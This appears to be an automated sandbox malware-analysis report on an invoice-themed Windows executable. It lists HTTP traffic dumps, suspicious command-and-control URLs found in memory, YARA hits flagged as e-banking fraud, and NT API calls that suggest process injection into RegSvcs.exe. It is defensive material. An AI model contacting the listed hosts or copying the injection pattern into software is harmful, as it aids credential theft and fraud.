                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:31:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8d7a532bdfc4e510-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16ef<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:31:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCHOoxPsJaPWs9EBkOG%2F0B%2FjJzSPfqRpowV44KZX77grvGMuWFrh%2BGp%2FPjmcD4VLxKermaFoMY2CCeff3gWmRdsKnObkJmeUTau1qK%2FTHvMBN68wNO5lw3IVzhihiIOtlfCtlYuFbeA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7a54067a6345fb-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=691&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:31:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XoHLcYZuLwxjhLPCIUxlwo86rJWge7qcg2vCsH8CElroyIesz%2FpaGU%2FqTHIz%2F3%2FongVCEeCw44LaYQIaCfx1NH%2BYcIpl25H3ESRGflrn02lS3QDpphriAxuqP0wuWaBRmRQ64V4jf4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7a54165977464e-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:31:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqoyXcAqf%2FeGAMp%2FmLm3K5Qrz8imcU57RBqdHCnhQgvEdeHB%2F1O32xmLFvg6IvUMr%2BwaUdIInu4i44RLtbtEohBXrfMjXZ8N4UbDZl6oKNxv8v%2FsgWt5r1pHXWS%2FREC0FcP2hp1TEDU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7a54266c6b83a1-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1378&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1728&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 19
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 13:31:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ET%2BJwMAwEgYpZKAkdNYkPt7KcevZM9KfP8gYRXHpemXgxm8fA3c01KUXGl8XP0qazUPrLPrVikGuFgyuPB5PT9hgmBy6%2BvG6bHw700W7XuucYu0wDKVRKv7s%2BYoub9xqZ3Nk0ZemaE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7a54362aeba91e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=418&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:31:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:31:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:31:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 13:31:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.000000000485C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.000000000401C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://estrela-b.online/62tt/?C6=EXkTb&pZxtux=2eR3StT9zNfU5ywUIZ2bgc3wtAC6ZBxlVhDhLCkeE
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.00000000049EE000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.00000000041AE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOp
                Source: Due Payment Invoice PISS2024993.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: cJjnESPXORw.exe, 00000005.00000002.3915813020.00000000062CE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ak711ka10.lat
                Source: cJjnESPXORw.exe, 00000005.00000002.3915813020.00000000062CE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ak711ka10.lat/o5z9/
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.0000000004538000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.0000000003CF8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: xcopy.exe, 00000006.00000002.3911641445.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: xcopy.exe, 00000006.00000003.2595134579.0000000007A2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: xcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cJjnESPXORw.exe, 00000005.00000002.3914135541.00000000043A6000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.3913169084.0000000003B66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: initial sampleStatic PE information: Filename: Due Payment Invoice PISS2024993.exe
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D2CA8 NtQueryInformationProcess,0_2_098D2CA8
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D2CA0 NtQueryInformationProcess,0_2_098D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042C403 NtClose,3_2_0042C403
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022B60 NtClose,LdrInitializeThunk,3_2_01022B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01022DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01022C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010235C0 NtCreateMutant,LdrInitializeThunk,3_2_010235C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01024340 NtSetContextThread,3_2_01024340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01024650 NtSuspendThread,3_2_01024650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022B80 NtQueryInformationFile,3_2_01022B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022BA0 NtEnumerateValueKey,3_2_01022BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022BE0 NtQueryValueKey,3_2_01022BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022BF0 NtAllocateVirtualMemory,3_2_01022BF0
